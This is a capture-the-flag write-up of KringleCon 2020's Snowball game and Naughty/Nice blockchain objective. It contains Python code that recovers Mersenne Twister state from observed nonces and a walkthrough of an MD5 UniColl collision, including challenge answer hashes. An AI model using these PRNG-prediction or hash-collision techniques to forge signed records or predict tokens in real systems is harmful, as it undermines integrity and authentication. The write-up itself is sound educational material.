Start the game from Kringlecon (in an iframe) on impossible. It is important not to use an independent instance here, so that the game result is successfully communicated to Kringlecon. Extract the 624 rejected user names from the source code and copy them into a file seeds.txt . NOTE: just opening the source code directly form the iframe fails horrible, at least for firefox, because the browser requests a fresh source from the server, causing new random numbers to be generated. This cost me a lot of time to realize. Instead, the comment with the user names should be pulled from an inspection tool, using e.g. firefox developer tools. Run the predictor code ( mersenne.py ) on seeds.txt to generate the user name used by the game Start an easy game on a standalone instance and set the user name to the predictor output. Check that all is well by comparing the player fort layout. Kick ass :-). The AI never misses on this level, so the player can only win if every throw hits a target.

Upon completion, an impressed Tangle Coalbox offers a series of hints for objective 11.

Objective 11: Naughty/Nice List with Blockchain Investigation

Difficulty: 5

Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000? Talk to Tangle Coalbox in the Speaker UNpreparedness Room for tips on prediction and Tinsel Upatree for more tips and tools. (Enter just the 16-character hex hash)

Difficulty: 5

The SHA256 of Jack's altered block is: 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f. If you're clever, you can recreate the original version of that block by changing the values of only 4 bytes. Once you've recreated the original block, what is the SHA256 of that block?

I) Hints and resources

Tinsel Upatree: Howdy Santa! Just guarding the Naughty/Nice list on your desk. Santa, I don't know if you've heard, but something is very, very wrong... We tabulated the latest score of the Naughty/Nice Blockchain. Jack Frost is the nicest being in the world! Jack Frost!?! As you know, we only really start checking the Naughty/Nice totals as we get closer to the holidays. Out of nowhere, Jack Frost has this crazy score... positive 4,294,935,958 nice points! No one has EVER gotten a score that high! No one knows how it happened. Most of us recall Jack having a NEGATIVE score only a few days ago... Worse still, his huge positive score seems to have happened way back in March. Our first thought was that he somehow changed the blockchain - but, as you know, that isn't possible. We ran a validation of the blockchain and it all checks out. Even the smallest change to any block should make it invalid. Blockchains are huge, so we cut a one minute chunk from when Jack's big score registered back in March. You can get a slice of the Naughty/Nice blockchain on your desk. You can get some tools to help you here. Tangle Coalbox, in the Speaker UNPreparedness room. has been talking with attendees about the issue.

⟶ Small portion of the Naughty/Nice Blockchain including Jack Frosts suspicious block.

⟶ Official Naughty Nice Blockchain Education Pack containing commented python code for blockchain manipulation and required keys.

⟶ naughty_nice.py within the education pack has an extensive docstring explaining how the naughty/nice blockchain functions.

Additional hints after solving the Snowball Game challenge:

Tangle Coalbox: Great work identifying and abusing the pseudo-random sequence. Now, the REAL question is, how else can this be abused? Do you think someone could try and cheat the Naughty/Nice Blockchain with this? If you have control over to bytes in a file, it's easy to create MD5 hash collisions. Problem is: there's that nonce that he would have to know ahead of time. A blockchain works by "chaining" blocks together - so there's no way that Jack could change it without it messing up the chain... Maybe if you look at the block that seems like it got changed, it might help. If Jack was able to change the block AND the document without changing the hash... that would require a very UNIque hash COLLision. Apparently Jack was able to change just 4 bytes in the block to completely change everything about it. It's like some sort of evil game to him. That's about all the help I can give you, kid, but Prof. Petabyte may have more.

⟶ Qwerty Petabyte is giving a talk about blockchain tomfoolery!

⟶ Shinny Upatree swears that he doesn't remember writing the contents of the document found in the block that seems like it got changed. Maybe looking closely at the documents, you might find something interesting.

⟶ Excellent background on MD5 Hash Collisions: Extensive slidedeck on different types of MD5 hash collision, and a Youtube talk by the same author.

II) Vulnerability of the naughty/nice blockchain

The Naughty/Nice blockchain, the mother of them all according to elf lore, was conceived decades ago by Santoshi Santamoto to collect all the reports on naughtiness and niceness throughout the year. The idea was to set up a totalitarian regime to simplify christmas decision making. Rumours are afoot that our hero, Jack Frost, has managed to hack this blockchain, giving himself the highest niceness score ever, which is of course impossible.

The structure of each block of the blockchain is explained in the blockchain code supplied as part of the toolbox, naughty_nice.py. It starts with the index of the block within the chain, and a randomly selected nonce, both provided by the elfu block submission portal (orange). This is followed by elf supplied content (green): the person id (pid) of who the block is about, the reporter id (rid) of the reporting elf, the naughty/nice score and, critically, a sign (0 or 1) indicating whether the score reports naughtyness or niceness. It also includes one or more supporting documents which can be a variety of file formats including binary, but are usually pdf. Behind the elf supplied data, the portal adds date and time, followed by the MD5 hash of the previous block in the chain.

As next step, the portal MD5 hashes all block data up to this point. This hash is included in the block and also sent off to the super-secure OS3 (Official Santa Signature System) certification authority, who signs it with their private key and returns the signature. OS3 can be assumed non-hackable, even Santa himself cannot access it on his own. However, OS3 only sees the hash and nothing else about the block. This signature is the final element of the block.

The reason why MD5 hashes are considered completely insecure for cryptographic purposes is that hash collisions can be crafted which permit the creation of pairs of documents having the same hash but differing in a number of bytes. By using these differences wisely, the two documents can be made to show completely different content. It should be noted that currently it is impossible to design a second document to have the same hash as a given target document. Instead, colliding documents have to be crafted in pairs (or larger groups).

A number of techniques are available to craft colliding documents with a common prefix (when the start of the documents is the same), which include FastColl, UniColl and Shattered. These techniques have in common that they produce almost identical documents differing only in a limited number of isolated bytes in fixed positions. They also introduce randomness into certain parts of the documents, which depends on the prefix and has to be hidden away by the document structure in some way.

MD5 works by processing 64 byte chunks of data at a time, feeding the hash of the previous chunk into the next. As a consequence, if two documents have a hash collision within the first n chunks and are identical thereafter, then the hashes of the complete documents must also be the same. Thanks to this property, if collision is achieved within the elf supplied parts of two blockchain blocks, then the "internal" hash of those blocks will be the same, and hence their OS3 signatures will be identical.

The only problem is the nonce. It is introduced at the beginning of a block and is therefore part of the common prefix, which has to be known when the colliding blocks are created. However, the nonce is selected randomly when the data for a new block is submitted to the elfu portal. In order to build colliding blocks, this nonce somehow has to be predicted in advance.

III) Predicting the nonce

According to its description, the code provided in naughty_nice.py is part of the current naughty/nice blockchain codebase. The constructor of the Block class shows that the python 3 random module is used to create the nonce, which employs Mersenne Twisters:

self.nonce = random.randrange( 0xFFFFFFFFFFFFFFFF )

The approach for predicting pseudo-random numbers from the Snowball game terminal challenge can be reused, but needs to be adapted to 64-bit random numbers. A look at the source of mt19937predictor.py shows that there is a member function pair getrandbits(bits) and setrandbits(y, bits) which handles integers greater than 32 bit by cutting them up into 32 bit pieces. Each of those pieces represents a separate call to the more basic genrand_int32() and setrand_int32(y) , respectively. As a consequence, 312 64-bit nonces are enough to get the MT19937 Mersenne predictor started. The nonce_predictor.py script below walks through the blockchain, uses the first 312 nonces to seed the predictor and then verifies that predicted and actual nonces are equal for the rest of the blockchain.

from SANS.y2020.obj11_naughty_nice.naughty_nice import *from mt19937predictor import MT19937Predictorc2 = Chain(load=True, filename='blockchain.dat')predictor = MT19937Predictor()for i in range(len(c2.blocks)): nonce = c2.blocks[i].nonce if i < 312: # seeding predictor.setrandbits(nonce, 64) else: # verification predicted_nonce = predictor.getrandbits(64) if nonce != predicted_nonce: print(c2.blocks[i].index, hex(nonce), hex(predicted_nonce))# prediction of future noncesfor future_index in range(1,5): print(c2.blocks[-1].index + future_index, hex(predictor.getrandbits(64)))

At the end, 4 future nonces are predicted, solving objective 11a.

129997 0xb744baba65ed6fce129998 0x1866abd00f13aed129999 0x844f6b07bd9403e4130000 0x 57066318f32f729d

IV) Undoing the modification

To find out what happened, we first need to pick out the suspicious block by looking for a specific SHA256 hash. The short script blockchain_investigation.py does just that:

from naughty_nice import *with open('official_public.pem', 'rb') as fh: official_public_key = RSA.importKey(fh.read())c2 = Chain(load=True, filename='blockchain.dat')# Find Jack's altered blocksha256 = " 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f "starting_index = c2.blocks[0].indexfor block in c2.blocks: hash_obj = SHA256.new() hash_obj.update(block.block_data_signed()) if hash_obj.hexdigest() == sha256: chain_index = block.index - starting_index print(f"Jacks altered block: position {chain_index} in chain") print(block) c2.save_a_block(chain_index, "Jacks_block") for n in range(block.doc_count): block.dump_doc(n+1)

The data structure of Jack's block is outlined in the section II) diagram. Apart from an absolutely unearthly niceness score, it contains two documents, a random-looking binary 129459.bin and a pdf file 129459.pdf. This pdf appears to be mildly corrupt: Acrobat Reader rejects it disdainfully, but the browser internal pdf viewer is more lenient. An ode to the many virtues of Saint Jack, signed by no other than Shinny Upatree! No wonder the poor elf is besides himself. How is this possible?

To find out, let's take a closer look at Jacks_block in a hex editor. Its binary structure can be associated by comparing with the block_data() member of Block in naughty_nice.py. At the very least, Jack must have changed the naughty/nice sign at 0x49 and performed some magic with the PDF document beginning at 0xCA. Byte 0x49 is surrounded with non-random characters up to 0x54, where the random looking binary content 129459.bin starts. The area of randomness conveniently stops exactly at a 64 byte chunk boundary, at 0xBF. This is characteristic of the UniColl method of creating collisions, which is confirmed by the hint dropped by Tangle Coalbox in his speech.

Presented with an arbitrary prefix ending at a 64 byte chunk boundary and chosen values for the first 4*n bytes of the colliding chunks, UniColl creates 128 bytes (2 chunks) of collision data for each of the documents. These are uncontrollably random after the first 4*n bytes, and differ only in the positions 0x09 and 0x49 by +1 and -1 respectively. A value of n=5 was used here; larger values of n quickly lead to high computation times and possibly failures. This method matches perfectly with Jack's block, where the naughty/nice sign is located exactly 10 bytes behind a chunk boundary and where the randomness created is hidden away in dedicated binary content. The perfect crime! This would account for 2 of the 4 required byte changes. To test the theory, let's change bytes 0x49 and 0x89 in a python console:

>>> from naughty_nice.py import *>>> jack = bytearray(open("Jacks_block", "rb").read())>>> hash_before = MD5.new()>>> hash_before.update(jack)>>> hash_before.hexdigest()'b10b4a6bd373b61f32f4fd3a0cdfbf84'>>> jack[0x49] -= 1>>> jack[0x89] += 1>>> hash_after = MD5.new()>>> hash_after.update(jack)>>> hash_after.hexdigest()'b10b4a6bd373b61f32f4fd3a0cdfbf84'

QED. Two byte changes are left for the PDF modification, so this is most likely again UniColl. To see what might have happened, it helps to examine the pdf in a plain text editor:

Several oddities are noticeable: First off the catalog at lines 5-7 contains binary content which should definitely not be there. It also contains the keys /_Go_Away/Santa , probably not part of the official PDF standard. Next, there are two separate root nodes for the page tree at lines 11 and 15 (they must be root nodes, because they lack a /Parent ), and a document should only have one. Each of these points to a single, different child page. Finally, there is added binary content at the end of the file, behind the %%EOF marker.

The two alternate root notes would be a clever way to change the shown PDF content completely with a single byte change, by pointing at one or the other from the catalog with /Pages 2 0 R or /Pages 3 0 R . A look at the hex listing of the block confirms that the root node reference in the catalog lies at 0x109, exactly 10 bytes behind a 64 byte chunk boundary, meaning it can be manipulated with UniColl. The extra key /_Go_Away/Santa was designed to move it there, and the binary junk is UniCollateral damage which is ignored by lenient PDF viewers. Continuing in the python console to change bytes 0x109 and 0x149 back to the original

>>> jack[0x109] += 1>>> jack[0x149] -= 1>>> hash_final = MD5.new()>>> hash_final.update(jack)>>> hash_final.hexdigest()'b10b4a6bd373b61f32f4fd3a0cdfbf84'>>> hash_sha256 = SHA256.new()>>> hash_sha256.update(jack)>>> hash_sha256.hexdigest()' fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb '

confirms the theory and spits out the answer to objective 11b. The original PDF makes interesting reading and fills in the story. Pretty cool social engineering ... this also explains why all the text content in the manipulated PDF is stream encoded, so that the original content cannot be read too easily.

Epilogue

Just in time, Santa has been defrosted for good, and the holiday has been saved. The balcony in Santa's office is now unlocked, and outside Santa awaits together with a rather frosty looking Jack clad in orange, ready for prison. No ominous notes this time, it seems ...

Santa: Thank you for foiling Jack’s foul plot! He sent that magical portrait so he could become me and destroy the holidays! Due to your incredible work, you have set everything right and saved the holiday season! Congratulations on a job well done!

Jack Frost: My plan was NEARLY perfect… but I never expected someone with your skills to come around and ruin my plan for ruining the holidays! And now, they’re gonna put me in jail for my deeds.

Many thanks to Ed Skoudis and all the other makers of Kringlecon for creating a wonderful holiday experience in an otherwise rather dreary year. As before, there were interesting talks, tough challenges and some very nice music, and the official Discord site was an excellent addition, creating a lively group feeling! Many thanks also too all the Discorders who patiently gave hints and provided insights without revealing too much! The hardest nut to crack for me was ARP Shenanigans. It really speaks for the challenge design that someone without much of a clue about packet layer was able to battle on and get through, learning a huge amount on the way. The greatest temptation now is probably to go buy a Proxmark :-)

Hope to be back next year!

KringleCon back at the castle, set the stage...

But it's under construction like my GeoCities page.

Feel I need a passport exploring on this platform -

Got half floors with back doors provided that you hack more!

Heading toward the light, unexpected what you see next:

An alternate reality, the vision that it reflects.

Mental buffer's overflowing like a fast food drive-thru trash can.

Who and why did someone else impersonate the big man?

You're grepping through your brain for the portrait's "JFS"

"Jack Frost: Santa," he's the villain who had triggered all this mess!

Then it hits you like a chimney when you hear what he ain't saying:

Pushing hard through land disputes, tryin' to stop all Santa's sleighing.

All the rotting, plotting, low conniving streaming from that skull.

Holiday Hackers, they're no slackers, returned Jack a big, old null!